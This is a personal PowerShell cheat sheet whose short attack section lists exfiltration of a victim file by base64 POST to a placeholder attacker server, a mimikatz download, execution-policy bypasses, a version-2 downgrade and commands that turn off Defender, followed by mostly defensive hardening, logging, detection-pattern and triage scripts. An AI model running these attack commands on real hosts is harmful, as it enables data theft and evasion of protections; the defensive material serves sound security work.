
Personal sheet for PowerShell 🧢

License: GNU General Public License v3.0 (GPL-3.0)

PowerShell Commands

TO BE CONTINUED indefinitely...

Attacking techniques: practical examples

HTTP requests

Exfiltrate data

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri https://{ATTACKER_IP_SERVER} -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Victim\path\to\data.xml')))

Download attacking tools

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -Method GET -uri https://{ATTACKER_IP_SERVER}/exec/mimikatz.exe -OutFile "c:\Users\Victim\mimi.exe"

Bypass Execution policy

PowerShell.exe -noprofile -executionpolicy bypass -file .\malicious.ps1


Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force

Setting the execution policy to RemoteSigned is not a safeguard either: locally created unsigned scripts still run.

Exploit debugging variables


If this env var is set on production, there's a chance admins think it's a safety measure.

Perform a downgrade attack

PowerShell.exe -Version 2

Older versions of PowerShell have fewer security features, according to unicorn.

Run PowerShell commands without PowerShell.exe

You can use p0wnedShell or the more recent PowerLessShell.

Disable critical protections

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true

Attack RDP connections

If admins use a misconfigured RDP (Remote Desktop Protocol) setup for remoting, it can be brute-forced and then used to run malicious cmdlets.


Limit unconstrained code execution

$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

Default since PowerShell v5 if you use AppLocker.

Use AppLocker


Overview by Microsoft

cmdlets for AppLocker

Get the current AppLocker configuration
Get-AppLockerPolicy -Effective

Create an AppLocker policy


Test an exec against the AppLocker policy

Test-AppLockerPolicy -Path <path_to_exec>

Add GPOs (Group policies)

Enable Module and Script block logging

Go to Windows Configuration > Policies > Administrative Settings > Windows Components > Windows PowerShell

  • Turn on Module Logging
  • Turn on PowerShell Script Block Logging

or with PowerShell:

Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging"  -Name EnableModuleLogging -Value "1"
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockInvocationLogging -Value "1"

Then, it's possible to forward the logs to a SIEM or similar software.

Enable transcripting

GPO or:

Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value "1"
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableInvocationHeader" -Value "1"

Enable Protected Event Logging

Go to Windows Components -> Administrative Templates -> Event Logging: "Enable Protected Event Logging." You'll have to provide a valid certificate.


Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging" -Name "EnableProtectedEventLogging" -Value "1"
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging" -Name "EncryptionCertificate" -Value $Certificate

Where $Certificate is your certificate.
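The three logging settings above, as one script. This is an added example, not code from the original sheet: it writes the same policy registry values the sheet uses, but creates each key first (Set-ItemProperty fails when the key does not exist yet), adds the ModuleNames entry that module logging needs and the OutputDirectory that transcription needs, and then reads every value back so the result can be checked. Assumptions: it runs from an elevated shell, C:\PSTranscripts is a placeholder directory, and protected event logging is left to the certificate-based commands above.

```powershell
# Added example (not from the original sheet). Enables module logging, script
# block logging and transcription through the policy registry keys, then reads
# the values back. Run elevated. C:\PSTranscripts is a placeholder path.

$Base = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    # Creates the key if needed, then writes (or overwrites) one value under it.
    param([string]$SubKey, [string]$Name, $Value, [string]$Type = 'DWord')
    $key = Join-Path $Base $SubKey
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

function Enable-PowerShellLogging {
    param([string]$TranscriptDirectory = 'C:\PSTranscripts')   # placeholder

    # Module logging: the switch plus a ModuleNames entry ('*' = every module)
    Set-PolicyValue -SubKey 'ModuleLogging' -Name 'EnableModuleLogging' -Value 1
    Set-PolicyValue -SubKey 'ModuleLogging\ModuleNames' -Name '*' -Value '*' -Type 'String'

    # Script block logging (event 4104) and invocation start/stop events (4105/4106)
    Set-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 1
    Set-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockInvocationLogging' -Value 1

    # Transcription: every session is written to a dated file in the output directory
    Set-PolicyValue -SubKey 'Transcription' -Name 'EnableTranscripting' -Value 1
    Set-PolicyValue -SubKey 'Transcription' -Name 'EnableInvocationHeader' -Value 1
    Set-PolicyValue -SubKey 'Transcription' -Name 'OutputDirectory' -Value $TranscriptDirectory -Type 'String'
}

function Get-PowerShellLoggingState {
    # Reads each setting back; Configured is $false when the value is missing.
    $checks = @(
        @{ SubKey = 'ModuleLogging';      Name = 'EnableModuleLogging' },
        @{ SubKey = 'ScriptBlockLogging'; Name = 'EnableScriptBlockLogging' },
        @{ SubKey = 'ScriptBlockLogging'; Name = 'EnableScriptBlockInvocationLogging' },
        @{ SubKey = 'Transcription';      Name = 'EnableTranscripting' },
        @{ SubKey = 'Transcription';      Name = 'EnableInvocationHeader' },
        @{ SubKey = 'Transcription';      Name = 'OutputDirectory' }
    )
    foreach ($c in $checks) {
        $key   = Join-Path $Base $c.SubKey
        $value = (Get-ItemProperty -Path $key -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
        [pscustomobject]@{
            Setting    = "$($c.SubKey)\$($c.Name)"
            Value      = $value
            Configured = ($null -ne $value)
        }
    }
}

Enable-PowerShellLogging
Get-PowerShellLoggingState | Format-Table -AutoSize
```

Values written under HKLM:\Software\Policies are overwritten by Group Policy on the next refresh when a GPO configures the same settings, so on domain-joined hosts the GPO route above is the one that sticks; the script is mainly useful for standalone machines and for verifying what a GPO actually applied.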

Set Execution policy

Set-ExecutionPolicy Restricted

Restricted should be the default, but check it.


Disable PowerShell v2 (removes the downgrade target)

Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
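A read-only audit of the hardening settings covered above (execution policy per scope, the PowerShell v2 engine, the session language mode, the two Defender switches the attacking section shows being turned off, and whether an AppLocker policy is in effect). This is an added example, not code from the original sheet. Assumptions: it runs from an elevated shell (Get-WindowsOptionalFeature requires one), the Defender and AppLocker cmdlets exist on the host, and the Ok column encodes this sheet's recommendations rather than a universal baseline.

```powershell
# Added example (not from the original sheet): audit the local host against the
# hardening settings recommended above. Read-only; run elevated.

function Get-PowerShellHardeningReport {
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Check, $Value, [bool]$Ok) {
        $findings.Add([pscustomobject]@{ Check = $Check; Value = $Value; Ok = $Ok })
    }

    # 1. Execution policy. A policy delivered by GPO (MachinePolicy / UserPolicy)
    #    takes precedence over Set-ExecutionPolicy and over the -ExecutionPolicy
    #    switch, which is why the "bypass" one-liners above only work when the
    #    GPO scopes are undefined.
    $byScope  = Get-ExecutionPolicy -List
    $machine  = ($byScope | Where-Object Scope -eq 'MachinePolicy').ExecutionPolicy
    Add-Finding 'ExecutionPolicy (MachinePolicy, from GPO)' $machine ($machine -in 'Restricted', 'AllSigned')
    $effective = Get-ExecutionPolicy
    Add-Finding 'ExecutionPolicy (effective)' $effective ($effective -in 'Restricted', 'AllSigned')

    # 2. PowerShell v2 engine, the target of "PowerShell.exe -Version 2"
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    $v2State = if ($v2) { $v2.State } else { 'Unknown (run elevated)' }
    Add-Finding 'PowerShell v2 engine' $v2State ($v2State -eq 'Disabled')

    # 3. Language mode of this session
    $mode = $ExecutionContext.SessionState.LanguageMode
    Add-Finding 'LanguageMode (this session)' $mode ($mode -eq 'ConstrainedLanguage')

    # 4. Defender switches the attacking section shows being disabled
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($pref) {
        Add-Finding 'Defender DisableRealtimeMonitoring' $pref.DisableRealtimeMonitoring (-not $pref.DisableRealtimeMonitoring)
        Add-Finding 'Defender DisableIOAVProtection'     $pref.DisableIOAVProtection     (-not $pref.DisableIOAVProtection)
    }

    # 5. AppLocker: number of rules in the effective policy (0 = nothing enforced)
    $xml = Get-AppLockerPolicy -Effective -Xml -ErrorAction SilentlyContinue
    $ruleCount = if ($xml) { ([xml]$xml).SelectNodes('//RuleCollection/*').Count } else { 0 }
    Add-Finding 'AppLocker rules (effective)' $ruleCount ($ruleCount -gt 0)

    return $findings
}

Get-PowerShellHardeningReport | Format-Table -AutoSize
```

The language-mode check only describes the session the audit runs in; a user-level ConstrainedLanguage assignment like the one above is undone by opening a new process, so a result of ConstrainedLanguage only means something when AppLocker (or another policy) enforces it.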

More advanced tricks there

Challenges for attackers

Some attacks attempt to modify settings and disable some protections. There are important inconveniences for attackers, though:

  • most commands require an elevated shell
  • notifications are sent by default
  • Windows events are triggered by default

Suspicious Cmdlets

Many legitimate commands like Invoke-WebRequest can be exploited by attackers, but some cmdlets look more suspicious than others. Here are a few examples:

  • Invoke-Mimikatz
  • Invoke-ShellCode
  • Get-FileHash
  • Invoke-DllInjection
  • Get-Hotfix | measure

It often means attackers used a known tool (e.g., PowerSploit, Mimikatz, Powercat) or performed advanced enumeration.
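A small detection that turns the list above into a scan of the script block log. This is an added example, not code from the original sheet: it looks for the cmdlet names listed above plus the command-line patterns shown in the attacking section (execution-policy bypass, the v2 downgrade, disabling Defender, base64-encoding a file for a POST) in Event ID 4104 events, and ships with constructed sample inputs so the matcher can be tried without reading the event log. Assumptions: Script Block Logging is enabled on the host, and the pattern list is a starting point rather than a complete signature set.

```powershell
# Added example (not from the original sheet): flag suspicious script block log
# events (Event ID 4104, Microsoft-Windows-PowerShell/Operational). The pattern
# list is built from this sheet and is a starting point, not a full signature set.

$SuspiciousPatterns = @(
    'Invoke-Mimikatz',
    'Invoke-ShellCode',
    'Invoke-DllInjection',
    'Get-FileHash',
    'Get-Hotfix\s*\|\s*measure',
    # command-line tricks from the attacking section
    '-(ex|ep|executionpolicy)\s+(bypass|unrestricted)',
    'Set-ExecutionPolicy\s.*(Bypass|Unrestricted)',
    'powershell(\.exe)?\s.*-version\s+2\b',
    'Set-MpPreference\s+-Disable',
    'ToBase64String\(\[System\.IO\.File\]::ReadAllBytes'
)

function Test-SuspiciousScriptBlock {
    # Returns the first matching pattern, or $null when the text looks benign.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptBlockText)
    foreach ($pattern in $SuspiciousPatterns) {
        if ($ScriptBlockText -match $pattern) { return $pattern }   # -match is case-insensitive
    }
    return $null
}

function Get-SuspiciousScriptBlockEvents {
    param([datetime]$Since = (Get-Date).AddDays(-1), [int]$MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # In a 4104 event, Properties[2] carries the ScriptBlockText
            $text = [string]$_.Properties[2].Value
            $hit  = Test-SuspiciousScriptBlock -ScriptBlockText $text
            if ($hit) {
                $oneLine = $text -replace '\s+', ' '
                [pscustomobject]@{
                    Time     = $_.TimeCreated
                    Computer = $_.MachineName
                    Pattern  = $hit
                    Snippet  = $oneLine.Substring(0, [Math]::Min(120, $oneLine.Length))
                }
            }
        }
}

# Constructed sample script block texts (not real log data) to exercise the
# matcher offline; only the last three should match.
$Samples = @(
    'Get-ChildItem Env:',
    'Invoke-WebRequest -uri https://intranet.example/report.xml -OutFile report.xml',
    'PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri https://{ATTACKER_IP_SERVER} -Method POST',
    'Invoke-Mimikatz -DumpCreds',
    'Set-MpPreference -DisableRealtimeMonitoring $true'
)
$Samples | ForEach-Object {
    [pscustomobject]@{ Matched = Test-SuspiciousScriptBlock $_; Text = $_ }
} | Format-Table -AutoSize

# On a host with script block logging enabled:
# Get-SuspiciousScriptBlockEvents -Since (Get-Date).AddHours(-6) | Format-Table -AutoSize
```

Two of the sheet's entries, Get-FileHash and the Get-Hotfix count, are ordinary admin commands and will produce noise; they are kept because the list above includes them, but in practice they belong in a lower-severity tier than the Invoke-* tool names.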

Enable JEA

JEA (Just Enough Administration) allows more control over PowerShell, especially if you need more granularity on cmdlets and security for remoting.

Source: Microsoft JEA

Misc: other helpful commands

Get list of installed software

Get-WmiObject Win32_Product | Select-Object Name

Note that querying Win32_Product is slow and makes Windows Installer run a consistency check (and possibly a repair) on every installed MSI package, so on production hosts the Uninstall registry keys are the safer source.

Get list of running processes


Get network connections


Get active firewall rules


Get list of scheduled tasks


Get event logs

Get-EventLog -LogName Security

Search for specific event logs

Get-EventLog -LogName Security | Where-Object {$_.EventID -eq <event_id>}

Get list of local user accounts


Get list of local group accounts


Get list of environment variables

Get-ChildItem Env:

Get list of services


Start a service

Start-Service -Name <service>

Stop a service

Stop-Service <service>

Stop a running process

Stop-Process -Name <process>

Remove a scheduled task

Unregister-ScheduledTask -TaskName <task>

Disable a firewall rule

Disable-NetFirewallRule -DisplayName <rule>
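The one-liners in this section gathered into a single triage snapshot. This is an added example, not code from the original sheet: it collects processes, network connections, enabled firewall rules, scheduled tasks, local users and groups, services, environment variables, installed software and the newest Security log events into one timestamped folder of CSV files, and can diff two such folders to show what changed since a baseline. Assumptions: C:\Triage is a placeholder output root; the Net*, ScheduledTask and Local* cmdlets need Windows 8 / Server 2012 or later with PowerShell 5.1; installed software is read from the Uninstall registry keys rather than Win32_Product.

```powershell
# Added example (not from the original sheet): snapshot host state to CSV files
# and compare two snapshots. C:\Triage is a placeholder output root.

function Get-HostTriageSnapshot {
    [ordered]@{
        Processes      = Get-Process | Select-Object Id, ProcessName, Path
        Connections    = Get-NetTCPConnection -State Established, Listen |
                         Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess
        FirewallRules  = Get-NetFirewallRule -Enabled True | Select-Object DisplayName, Direction, Action, Profile
        ScheduledTasks = Get-ScheduledTask | Where-Object State -ne 'Disabled' | Select-Object TaskName, TaskPath, State
        LocalUsers     = Get-LocalUser | Select-Object Name, Enabled, LastLogon
        LocalGroups    = Get-LocalGroup | Select-Object Name, SID
        Services       = Get-Service | Select-Object Name, Status, StartType
        Environment    = Get-ChildItem Env: | Select-Object Name, Value
        # Uninstall keys instead of Win32_Product (which triggers an MSI consistency check)
        Software       = Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*',
                                          'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*' -ErrorAction SilentlyContinue |
                         Where-Object DisplayName | Select-Object DisplayName, DisplayVersion, Publisher
    }
}

function Export-HostTriageSnapshot {
    # Writes every dataset to <OutputRoot>\<COMPUTERNAME>_<timestamp>\<name>.csv and returns the folder.
    param([string]$OutputRoot = 'C:\Triage')   # placeholder
    $dir = Join-Path $OutputRoot ('{0}_{1}' -f $env:COMPUTERNAME, (Get-Date -Format 'yyyyMMdd_HHmmss'))
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    $snapshot = Get-HostTriageSnapshot
    foreach ($name in $snapshot.Keys) {
        $snapshot[$name] | Export-Csv -Path (Join-Path $dir "$name.csv") -NoTypeInformation
    }
    # Newest 500 Security events (the same log the sheet queries with Get-EventLog)
    Get-WinEvent -LogName Security -MaxEvents 500 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, ProviderName, Message |
        Export-Csv -Path (Join-Path $dir 'SecurityLog.csv') -NoTypeInformation
    return $dir
}

function Compare-HostTriageSnapshot {
    # Lists rows that exist in only one of two snapshot folders (baseline vs. later capture).
    # The Security log is skipped because it always differs; an empty dataset on either side is skipped too.
    param([Parameter(Mandatory)][string]$BaselineDir, [Parameter(Mandatory)][string]$CurrentDir)
    foreach ($file in Get-ChildItem -Path $BaselineDir -Filter '*.csv' | Where-Object Name -ne 'SecurityLog.csv') {
        $currentFile = Join-Path $CurrentDir $file.Name
        if (-not (Test-Path $currentFile)) { continue }
        $baseline = @(Import-Csv $file.FullName)
        $current  = @(Import-Csv $currentFile)
        if ($baseline.Count -eq 0 -or $current.Count -eq 0) { continue }
        $props = $baseline[0].PSObject.Properties.Name
        Compare-Object $baseline $current -Property $props |
            Select-Object @{ n = 'Dataset'; e = { $file.BaseName } },
                          @{ n = 'Change';  e = { if ($_.SideIndicator -eq '=>') { 'Added' } else { 'Removed' } } },
                          *
    }
}

$first = Export-HostTriageSnapshot
# Later, after a suspected change:
# $second = Export-HostTriageSnapshot
# Compare-HostTriageSnapshot -BaselineDir $first -CurrentDir $second | Format-Table -AutoSize
```

Taking a snapshot on a known-good build and storing it off the host gives the comparison a trustworthy baseline; a snapshot taken only after an incident shows the current state but cannot tell you which service, task or firewall rule is new.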